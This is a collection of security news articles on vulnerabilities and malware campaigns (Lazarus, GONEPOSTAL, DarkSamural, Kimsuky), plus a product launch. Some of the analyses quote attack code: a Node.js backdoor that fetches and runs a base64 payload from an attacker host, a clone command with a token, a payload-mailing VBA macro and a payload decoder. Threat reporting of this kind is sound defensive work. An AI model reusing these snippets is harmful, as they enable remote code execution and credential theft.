• A critical security vulnerability has been discovered in the Amp’ed RF BT-AP 111 Bluetooth Access Point, exposing organizations to significant security risks through an unauthenticated administrative interface.

    The device, which serves as a Bluetooth-to-Ethernet bridge supporting both access point and gateway functionality, lacks fundamental authentication controls on its web-based management system.

    The vulnerability, designated as CVE-2025-9994, allows remote attackers with network access to gain complete administrative control over the device without requiring any credentials.

    This flaw affects the device’s HTTP-based administrative interface, which manages critical functions including Bluetooth configurations, network parameters, and security settings.

    The BT-AP 111 supports Universal Plug and Play (UPnP) on the Ethernet side and can handle up to seven simultaneous Bluetooth connections through its UART Serial interface.

    Carnegie Mellon University analysts identified this vulnerability through CERT Coordination Center research, highlighting the device’s failure to implement baseline security controls.

    The researchers noted that this configuration violates established NIST security guidelines, particularly SP 800-121 Rev. 2, which mandates authentication for Bluetooth devices at Service Level 2 or higher.

    Authentication Bypass Mechanism

    The vulnerability stems from a complete absence of authentication mechanisms in the device’s web interface architecture.

    Unlike typical network devices that implement login screens or certificate-based authentication, the BT-AP 111 directly exposes its administrative panel to any user accessing its HTTP port.

    This design flaw allows attackers to modify device configurations, alter Bluetooth pairing settings, and potentially intercept or manipulate data flowing through the bridge.

    The exploitation vector requires only network connectivity to the target device, making it accessible to both local network attackers and, in misconfigured environments, remote threats.

    Given the vendor’s lack of response to disclosure efforts, security professionals recommend isolating affected devices on segregated network segments inaccessible to untrusted users until proper authentication controls can be implemented.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Amp’ed RF BT-AP 111 Bluetooth Access Point Vulnerability Let Attackers Gain Full Admin Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Early this month, cybersecurity researchers uncovered a novel phishing campaign attributed to the Lazarus Group that targets developers and crypto professionals through a cleverly crafted Git symlink vulnerability.

    Rather than relying solely on traditional malware distribution channels, the attackers have weaponized the way Git handles repository paths, embedding malicious hooks within symbolic links to trigger code execution during routine operations.

    This technique allows the attackers to maintain a low profile while compromising high-value targets who assume that their development workflows are immune to social engineering.

    The initial lure begins with personalized messages on professional networking platforms, where prospective victims are invited to participate in a mock technical interview.

    The conversation is structured to gain the victim’s confidence and coax them into running a single Git clone command.

    Besides this, the repository contains a nested directory named api/db_drivers that is actually a symbolic link pointing back into the repository’s .git module directory.

    This deceptive structure ensures that once Git performs a checkout operation, it unwittingly executes the attacker’s custom hook script.

    KuCoin analysts noted the first instances of this attack vector in late August, following reports of compromised private GitLab repositories.

    Detailed analysis revealed that the symlink exploit leverages Git’s post-checkout hook mechanism to initiate a hidden backdoor.

    By embedding a malicious post-checkout script within the symbolic link, the attackers achieve code execution without modifying the main codebase, thus evading standard integrity checks and static scanners.

    Subsequent forensic examination confirmed that the payload establishes an encrypted connection to a remote command-and-control server, siphoning credentials, system information, and wallet data back to the threat actors.

    Attack Flowchart (Non-Technical) (Source – Kucoin)

    The exploit’s sophistication lies in its seamless integration with legitimate workflows. Victims report that after executing:-

    git clone --recursive https://guest:glpat-2xxxxxxyx@gitlab.tresalabs.com/product/delivery.git
    cd product/delivery

    The malicious hook is automatically triggered. The embedded script, hooks/post-checkout, invokes a Node.js backdoor:-

    const vm = require('vm');
    const https = require('https');
    https.get('https://gitlab.tresalabs.com:8443/api/v4/project', res => {
      let data = '';
      res.on('data', chunk => data += chunk);
      res.on('end', () => vm.runInNewContext(Buffer.from(JSON.parse(data).payload, 'base64')));
    });

    Once deployed, this backdoor maintains persistence by cleaning and replacing project files to remove obvious signs of tampering, ensuring that developers see only the expected code.

    Infection Mechanism Deep Dive

    The infection unfolds in two coordinated phases: exploitation of Git’s path resolution and stealthy hook execution.

    First, the attackers create a repository with a directory entry named api/db_drivers^M, exploiting carriage return handling to write the path as api/db_drivers on disk while retaining the symlink target internally.

    Attack Flowchart (Technical) (Source – Kucoin)

    This discrepancy confuses Git into treating the path as a regular directory during traversal but as a link when initializing hooks.

    As Git performs the default checkout, it follows the hidden symlink into the .git/modules/api/db_drivers/hooks/ directory and executes the post-checkout script.

    By exploiting a fundamental behavior of Git, the Lazarus Group has demonstrated a new level of technical ingenuity, blending supply chain compromise with social engineering to target high-value individuals.

    The campaign serves as a stark reminder that even the most trusted development tools can be weaponized when assumptions about workflow integrity go unchallenged.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Lazarus Hackers Exploiting Git Symlink Vulnerability in Sophisticated Phishing Attack appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A recent incident uncovered how a threat actor inadvertently exposed its entire operational workflow by installing a popular endpoint detection and response (EDR) agent on their own attacking infrastructure.

    The scenario unfolded when the adversary, while evaluating various security platforms, triggered alerts that led Huntress analysts to investigate unusual telemetry data.

    Initial observations of system activity and browser history hinted at sophisticated reconnaissance efforts, prompting researchers to delve deeper into the artifacts collected by the EDR system.

    Within hours of deployment, the agent recorded a range of interactions indicative of malicious intent.

    Huntress analysts noted that the unique machine identifier had appeared in prior compromise investigations, immediately flagging the host as adversarial.

    Subsequent correlation of authentication logs and telemetry data revealed patterns of credential theft, session token refreshes, and automated tooling execution.

    Researchers identified attempts to access rotated session tokens and found evidence of automated phishing campaigns orchestrated through bespoke scripts.

    The impact of this accidental installation cannot be overstated. For the first time, defenders gained granular visibility into the day-to-day routines of a live threat operator, from reconnaissance through to active exploitation.

    Google search for Bitdefender, leading to a Huntress ad (Source – Huntress)

    The threat actor’s day typically began with passive external scanning, later transitioning to targeted exploitation of identified organizations.

    Detailed browser history entries showed extensive use of both public and subscription-based services for reconnaissance, as well as the deployment of residential proxy services to anonymize traffic and evade detection.

    Over the course of a three-month period, the EDR telemetry captured a clear evolution in the attacker’s workflow.

    Early activities focused on researching banking institutions and third-party vendors, whereas later stages revealed the adoption of automated workflows for phishing message generation.

    Timeline (Source – Huntress)

    Huntress researchers identified a gradual shift toward more programmatic tool usage, with the adversary scripting repetitive tasks to increase operational efficiency.

    Infection Mechanism and Persistence Tactics

    A deeper look into the infection mechanism uncovers how the threat actor achieved initial access and maintained a foothold within target environments.

    Automated workflows (Source – Huntress)

    The adversary leveraged stolen session cookies extracted from Telegram Desktop cookie files using a simple Python script. The script, executed via:-

    from roadtx import PrtAuth
    
    auth = PrtAuth(token_file="victim_cookie.json")
    session = auth.acquire()
    print(session)

    This reveals how the attacker automated primary refresh token extraction for Microsoft Entra and Office 365 services.

    Once valid tokens were obtained, they were used to authenticate into victim accounts without triggering multifactor authentication or alerting endpoint defenses.

    Persistence was achieved by deploying scheduled tasks that regularly renewed session tokens and executed reconnaissance scripts. These tasks were registered in the Windows Task Scheduler under inconspicuous names to blend with legitimate processes.

    Various tools that the attacker may have used (Source – Huntress)

    Huntress analysts identified these entries and observed periodic outbound connections to attacker-controlled C2 servers, confirming ongoing control.

    This rare visibility into real-world threat actor behavior provided invaluable insights for defenders. By dissecting the infection and persistence techniques, security teams can craft targeted detection rules and harden authentication workflows against similar token-based attacks.

    The collaboration between telemetry-driven analysis and manual artifact review underscores the importance of comprehensive EDR solutions in modern security operations.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Threat Actor Installed EDR on Their Systems, Revealing Workflows and Tools Used appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Sofia, Bulgaria, September 10th, 2025, CyberNewsWire

    Kikimora, a cybersecurity specialist and a product developer, has announced the launch of Kikimora Agent, a new AI-powered platform providing accessible cybersecurity management, vulnerability detection, and asset monitoring for businesses, individuals, and students.

    Kikimora Agent combines conversational AI with automated security workflows, reducing the workload for small and medium-sized enterprises (SMEs) facing increased cyber attacks and growing security skills shortages.

    “Kikimora Agent reduces manual tool juggling and high skill requirements. The platform allows users to easily manage assets, run vulnerability scans, and generate compliance reports with simple prompts.

    It delivers immediate value to security teams with minimal setup and almost no learning curve.”, highlights Krasimir Kotsev, CEO of Kikimora.

    Kikimora Agent is designed to simplify traditionally complex cybersecurity processes and provides a split-screen interface for conversational interactions and live inventory management.

    Users can interact via natural language prompts to access security tools, manage infrastructure, monitor vulnerabilities, and receive actionable recommendations for remediation and compliance.

    Key segments supported include Attack Surface Management, Vulnerability Management, Asset Management, Endpoint Security, and Security Project Management.

    “Automation in cybersecurity is no longer a luxury – it’s a necessity for organizations with limited resources,” said Martin Malinov, Head of Product of Kikimora Agent.

    Kikimora Agent combines a range of security integrations – such as Qualys web application scanning and Wazuh endpoint monitoring – ensuring users maintain control over data privacy and compliance requirements.

    Kikimora Agent supports full workflow management, including listing and updating assets, executing and tracking vulnerability scans, assigning remediation tasks, querying OWASP checklists, and onboarding new endpoints.

    The agent’s experiment-and-estimate vertical allows rapid learning, scenario analysis, and tool migration without lengthy setup cycles.

    The agent can perform tasks based on local context, and provide actionable recommendations to improve your remediation efforts.

    Simply typing ‘Scan my web application…’, ‘List my current assets…’, or ‘Create a plan for NIS2 compliance…’ will prompt the agent to provide detailed information and a step-by-step guide to accomplish current objectives.

    The launch comes at a time when European SMEs are facing more cyber threats, with rising attack rates and stricter regulations like GDPR and NIS2.

    The goal of the Kikimora Agent is to reduce operational complexity and provide consolidated access to AI-enhanced security tools to a wider range of organizations and budgets.

    Users can start using Kikimora Agent at: https://agentic.kikimora.io/

    Users can find Get Started Guides, Documentation & Example Prompts: https://kikimora.gitbook.io/kikimora-agent-guide-early-access/

    About Kikimora

    Built by the experienced team of SoCyber, Kikimora provides cybersecurity solutions for organizations across Europe, specializing in cybersecurity product development and accessible automation.

    The company is committed to improving accessibility and security through practical, AI-powered tools that simplify operations for small and midsize teams.

    Contact

    CEO

    Krasimir Kotsev

    Kikimora

    marketing@so-cyber.com

    The post Kikimora Announces Launch of Kikimora Agent: Accessible AI-Powered Cybersecurity Platform for SME Security appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated phishing campaign has emerged targeting Google Workspace organizations through fraudulent emails impersonating Google’s AppSheet platform.

    The attack demonstrates how cybercriminals exploit legitimate cloud services to bypass traditional email security measures and steal user credentials.

    Discovered in September 2025, this campaign represents a significant escalation in social engineering tactics, leveraging the inherent trust organizations place in Google’s no-code application development platform.

    The malicious campaign capitalizes on AppSheet’s widespread enterprise adoption and deep integration with Google Workspace infrastructure.

    By masquerading as legitimate AppSheet communications, attackers successfully circumvent email authentication protocols while delivering convincing trademark violation notices to unsuspecting recipients.

    The attack’s effectiveness stems from its abuse of authentic Google infrastructure, making detection extraordinarily challenging for conventional security systems.

    This phishing operation follows a pattern of legitimate service abuse that security researchers have tracked since March 2025, when similar campaigns exploited AppSheet to impersonate Meta and PayPal services.

    Raven analysts identified the current trademark violation campaign as an evolution of these earlier tactics, noting how attackers have refined their approach to maximize credential harvesting success rates while maintaining operational security.

    The campaign’s most concerning aspect lies in its technical sophistication and authentication bypass capabilities.

    Unlike traditional phishing attacks that rely on compromised or spoofed domains, this operation leverages Google’s legitimate email infrastructure to deliver malicious content.

    Messages originate from noreply@appsheet.com, ensuring perfect SPF, DKIM, and DMARC authentication while maintaining excellent sender reputation scores.

    Technical Infrastructure and Delivery Mechanism

    The attack methodology exploits AppSheet’s legitimate email functionality through multiple potential vectors.

    Attackers either compromise existing user accounts on the platform or abuse the service’s notification systems to craft messages that appear authentically generated by Google’s infrastructure.

    Phishing email (Source – Raven)

    The phishing emails contain professionally formatted content mimicking trademark enforcement notices, complete with urgent legal compliance requirements designed to prompt immediate user action.

    Critical to the campaign’s success is its use of suspicious URL shorteners, particularly goo.su domains, which redirect victims to credential harvesting sites.

    These shortened links are embedded within otherwise legitimate-appearing legal notifications, creating a compelling pretext for user interaction.

    The attackers strategically host their phishing infrastructure on reputable platforms like Vercel, further enhancing the operation’s credibility and evasion capabilities.

    Detection proves challenging because the emails pass all traditional authentication checks while appearing contextually appropriate to recipients familiar with routine AppSheet communications.

    AppSheet phish breakdown (Source – Raven)

    This combination of technical legitimacy and social engineering sophistication highlights the urgent need for context-aware email security solutions that analyze sender-content relationships rather than relying solely on authentication protocols.

    The campaign underscores how legitimate cloud services can become weaponized attack vectors, forcing organizations to reconsider fundamental assumptions about trusted communications in enterprise environments.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New Phishing Attack Mimics Google AppSheet to Steal Login Credentials appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In recent weeks, security teams have observed a sophisticated new strain of malware—dubbed GONEPOSTAL—that subverts Microsoft Outlook to relay command and control (C2) instructions.

    Emerging through spear-phishing campaigns targeting corporate environments, GONEPOSTAL disguises itself as a benign Office document.

    Upon opening the weaponized attachment, victims unknowingly activate a multi-stage payload that interfaces directly with Outlook’s COM APIs to send and receive encrypted email messages containing C2 data.

    Early indicators suggest the threat actor behind GONEPOSTAL aims to maintain stealth by hiding network traffic within legitimate email flows, undermining traditional perimeter-based defenses.

    Kroll analysts noted that the initial compromise vectors rely on social engineering tactics that exploit common workplace behaviors.

    The malicious document leverages a heavily obfuscated VBA macro to drop a lightweight launcher executable into the user’s temporary folder.

    Once invoked, the launcher dynamically loads additional modules from a remote server, blending in with routine Outlook operations.

    These secondary modules parse the victim’s address book to identify likely internal targets for lateral movement, then craft outbound emails with base64-encoded control instructions embedded in image attachments.

    Kroll researchers identified that this tactic effectively bypasses most email gateway appliances, as the attachments appear as innocuous company logos or promotional flyers.

    In its third phase, GONEPOSTAL establishes persistence by creating a registry entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, referencing a benign-looking Word document named “Company_Update.docx.”

    This document contains a hidden OLE object that, when opened by the victim via Outlook preview, re-executes the payload without raising any security prompts.

    Further, the malware writes a DLL into the AppData\Roaming\Microsoft\Outlook directory and registers it with Outlook’s add-ins framework, ensuring that every instance of Outlook automatically loads the malicious component on startup.

    Victims typically remain unaware of the residence of the threat, as the add-in manifests under the name “OfficeUpdate.”

    The impact of GONEPOSTAL has been significant. Multiple mid-sized enterprises in North America have reported unexplained outbound email traffic spikes, matched by credential theft and unauthorized file transfers.

    Security teams investigating anomalous SMTP sessions uncovered encrypted JSON blobs masquerading as inline images, which—after decryption—revealed system reconnaissance data and remote shell commands.

    This dynamic C2 channel enables the adversaries to query registry keys, manipulate files, and pivot to domain controllers, all while evading standard detection signatures.

    Infection Mechanism

    A closer examination of GONEPOSTAL’s infection mechanism reveals the campaign’s reliance on a cleverly crafted VBA macro embedded within a booby-trapped document.

    Flowchart of execution (Source – Kroll)

    The macro code, heavily obfuscated to conceal its true purpose, begins by declaring Outlook COM object references:-

    Dim OutlookApp As Object
    Set OutlookApp = CreateObject("Outlook.Application")
    Dim MailItem As Object
    Set MailItem = OutlookApp.CreateItem(0)
    MailItem.To = recipientAddress
    MailItem.Subject = "Monthly Report"
    MailItem.Attachments.Add payloadPath
    MailItem.Send

    Once executed, this snippet not only dispatches the initial payload but also schedules follow-up tasks via the Windows Task Scheduler, ensuring that Outlook remains the primary conduit for ongoing command orchestration.

    By leveraging native Windows and Office components, GONEPOSTAL sidesteps external dependencies, making it especially challenging to pinpoint through conventional network monitoring tools.

    The infection chain culminates with the installation of a stealthy Outlook add-in, allowing the attacker to harvest sent and received emails, covertly modify message content, and issue new C2 commands without user awareness.

    This modular design demonstrates a high degree of operational maturity, indicating that the threat actor is well-versed in blending malicious activity into everyday user workflows.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post New GONEPOSTAL Malware Hijacking Outlook to Enable Command and Control Communication appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Apple has announced that the upcoming iPhone 17 and iPhone Air will feature a groundbreaking security capability called Memory Integrity Enforcement (MIE), designed to thwart sophisticated mercenary spyware attacks.

    This new feature, the result of a five-year engineering initiative, integrates Apple silicon hardware with advanced operating system security to provide what the company calls “industry-first, always-on memory safety protection” without impacting device performance.

    While the average iPhone user has not been subject to successful, widespread malware attacks, a more insidious threat exists in the form of mercenary spyware.

    These highly complex attacks are often associated with state actors and involve exploit chains that can cost millions of dollars to develop. They are used to target a very small number of specific individuals, such as journalists, activists, and government officials.

    A common link in these attacks, whether on iOS, Android, or Windows, is the exploitation of memory safety vulnerabilities. Apple’s MIE is a direct response to this threat, aiming to make such exploits significantly more difficult and expensive to carry out.

    This effort is part of a broader strategy at Apple to enhance memory safety, which also includes the development of memory-safe programming languages like Swift and the introduction of secure memory allocators in previous iOS versions.

    How MIE Provides Protection

    Memory Integrity Enforcement is built upon several layers of technology. It starts with Apple’s secure memory allocators, which organize memory based on its intended purpose, making it harder for attackers to corrupt.

    The core of MIE, however, is the use of the Enhanced Memory Tagging Extension (EMTE), a feature developed in collaboration with Arm, which is supported by the new A19 and A19 Pro chips.

    EMTE works by assigning a “tag” to each piece of memory. When a program tries to access that memory, the hardware checks if it has the correct tag.

    If the tags do not match, which can happen during a buffer overflow or use-after-free attack, the hardware immediately blocks the access and terminates the process.

    Memory Integrity Enforcement

    Apple’s implementation is strictly synchronous, meaning it checks for memory corruption in real-time, leaving no window for attackers to exploit.

    To protect against even the most advanced threats, MIE also includes Tag Confidentiality Enforcement to guard against side-channel and speculative-execution attacks that could reveal memory tags.

    Apple’s offensive research team spent five years, from 2020 to 2025, continuously attacking MIE prototypes to identify and eliminate potential weaknesses before the feature’s public release.

    The company’s evaluation, which tested MIE against real-world exploit chains used in previous attacks, concluded that the new protection fundamentally disrupts attackers’ strategies.

    The research showed that MIE blocks attacks so early in the process that it was not possible to rebuild the exploit chains by simply swapping in different vulnerabilities.

    With the launch of MIE, Apple aims to make this powerful protection available to third-party app developers through Xcode’s “Enhanced Security” settings.

    By making it immensely more expensive and difficult to develop and maintain memory corruption-based spyware, Apple believes Memory Integrity Enforcement represents one of the most significant upgrades to memory safety in the history of consumer operating systems.

    Find this Story Interesting! Follow us on Google NewsLinkedIn, and X to Get More Instant Updates.

    The post Apple iPhone 17 With New Memory Integrity Enforcement Feature to Block Mercenary Spyware Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Security researchers have observed a sophisticated campaign in recent weeks targeting critical infrastructure and government entities across South Asia.

    Dubbed the DarkSamural operation, this attack chain leverages deceptively crafted LNK and PDF files to infiltrate networks, establish persistence, and exfiltrate sensitive information.

    Initial reconnaissance indicates that the adversaries disguise malicious MSC (Microsoft Management Console) files with familiar PDF icons, enticing recipients to inadvertently launch embedded scripts.

    As the campaign unfolds, stolen credentials and system metadata flow back to the attackers’ command-and-control servers, enabling further lateral movement.

    The infection begins with a spear-phishing email containing a compressed archive. Recipients are presented with a file named Drone_Information.pdf[.]msc, which, despite its PDF-like appearance, executes when double-clicked.

    Ctfiot analysts noted that these MSC files employ GrimResource technology to unpack and run obfuscated JavaScript, which in turn downloads a second-stage payload.

    This multi-layered approach impedes signature-based detection, as each stage appears benign until deobfuscation occurs.

    Researchers identified that the malicious script contacts a remote URL and retrieves a disguised DLL, eventually stored under C:\ProgramData\DismCore[.]dll for subsequent execution.

    By the third paragraph, it becomes evident that DarkSamural’s impact extends beyond initial access.

    Victims have reported unauthorized file transfers, browser credential theft, and even remote shell access.

    The combination of open-source and proprietary RATs—including Mythic, QuasarRat, and BADNEWS—grants the attackers versatile control over compromised machines.

    Unit 942 Drone Info MAK3 (Source – Ctfiot)

    Files harvested range from administrative documents to proprietary research, underscoring the campaign’s strategic focus on exfiltrating high-value targets.

    Further analysis reveals that the malicious DLL embeds an export function, DIIRegisterServer, which dynamically resolves critical Windows APIs.

    Upon execution, the sample gathers host details such as machine name, user account, and process ID, packaging them into a JSON check-in packet.

    This packet is encrypted with AES-128-GCM and transmitted to the C2 endpoint over WinHTTP. The resulting network artifacts mimic legitimate update traffic, complicating anomaly detection.

    Infection Mechanism and Obfuscation

    A closer examination of the MSC file’s internal structure uncovers a multi-layered obfuscation scheme designed to thwart reverse engineering.

    The initial JavaScript code, embedded in an XML StringTable, triggers an XSL transformation that launches mmc[.]exe with a remote script reference.

    Phishing file (Source – Ctfiot)
    <StringTable>
      <GUID> {71E5B33E-1064-11D2-808F-0000F875A9CE} </GUID>
      <Strings>
        <String ID="14"> https[:]//caapakistaan[.]com/.../Unit-942-Drone-Info-MAK3[.]html </String>
      </Strings>
    </StringTable>

    After fetching the second layer, the script reverses character sequences, substitutes tokens, converts to hexadecimal, and performs Base64 decoding to produce the final DLL.

    The decoding routine exemplifies this transformation in Python:-

    def decode (str):
        b = list (str)
        c = ''[.]join (b[::-1]) [.]replace("$", "4") [.]replace ("!", "1")
        d = ''[.]join ([chr (int (c [i:i+2], 16)) for i in range (0, len (c), 2)])
        return base64[.]b64decode (d)

    Subsequently, the decoded bytes are written to disk and registered as a COM server, ensuring execution on system startup.

    This layered obfuscation, combined with scheduled task creation, illustrates DarkSamural’s meticulous approach to infection and evasion.

    Cybersecurity teams should inspect MSC file behavior, monitor anomalous mmc[.]exe invocations, and validate script-based downloads against known artifact hashes to detect and disrupt this campaign.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post DarkSamural APT Group Malicious LNK and PDF Files to Steal Critical Data appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • CyberVolk ransomware, which first emerged in May 2024, has escalated its operations against government agencies, critical infrastructure, and scientific institutions across Japan, France, and the United Kingdom. Operating with pro-Russian leanings, CyberVolk specifically targets states perceived as hostile to Russian interests, leveraging sophisticated encryption techniques that render decryption impossible. This article delivers a technical analysis […]

    The post CyberVolk Ransomware Targets Windows Systems in Critical Infrastructure and Research Institutions appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The North Korea-backed APT group Kimsuky has escalated its cyber operations by weaponizing GitHub repositories for malware delivery and data exfiltration, marking a sophisticated evolution in their attack methodology.

    This latest campaign demonstrates the group’s growing expertise in abusing legitimate cloud infrastructure to evade traditional security measures while maintaining persistent access to compromised systems.

    The attack chain begins with a malicious ZIP archive containing an LNK file disguised as an electronic tax invoice (전자세금계산서.pdf.lnk).

    When executed, this weaponized shortcut launches a PowerShell command that downloads and executes additional malicious scripts from attacker-controlled GitHub repositories.

    The initial payload establishes a foundation for systematic data collection and maintains long-term persistence on infected systems.

    S2W researchers identified nine private GitHub repositories associated with this campaign, including group_0717, group_0721, test, hometax, and group_0803.

    The threat actors embedded hardcoded GitHub Private Tokens directly within their PowerShell scripts to access these repositories, demonstrating careful operational security planning.

    Analysis of commit histories revealed the attacker’s email address (sahiwalsuzuki4[@]gmail.com) used during GitHub account creation.

    The malware’s persistence mechanism represents a particularly sophisticated approach to maintaining long-term access.

    Upon initial infection, the main.ps1 script creates a file named MicrosoftEdgeUpdate.ps1 under the %AppData% directory and establishes a scheduled task with the name “BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}”.

    This task executes every 30 minutes after an initial 5-minute delay, creating an automated system for fetching and executing updated PowerShell scripts from the GitHub repository.

    Dynamic Script Management and Information Gathering

    The malware employs a dynamic script management system that timestamps infected systems and creates customized folders for data exfiltration.

    The PowerShell payload downloads a file named real.txt from the repository, replaces placeholder strings with timestamped values (ntxBill_{MMdd_HHmm}), and re-uploads the modified script using a time-specific filename format.

    This mechanism allows attackers to track individual infections and manage multiple compromised systems simultaneously.

    The information-stealing component collects comprehensive system metadata including IP addresses, boot times, operating system details, hardware specifications, device types, installation dates, and running processes.

    All collected data is compiled into log files and uploaded to the attacker’s repository under timestamped folders, creating an organized intelligence database for the threat actors.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Kimsuky Hackers Via Weaponized LNK File Abuses GitHub for Malware Delivery appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶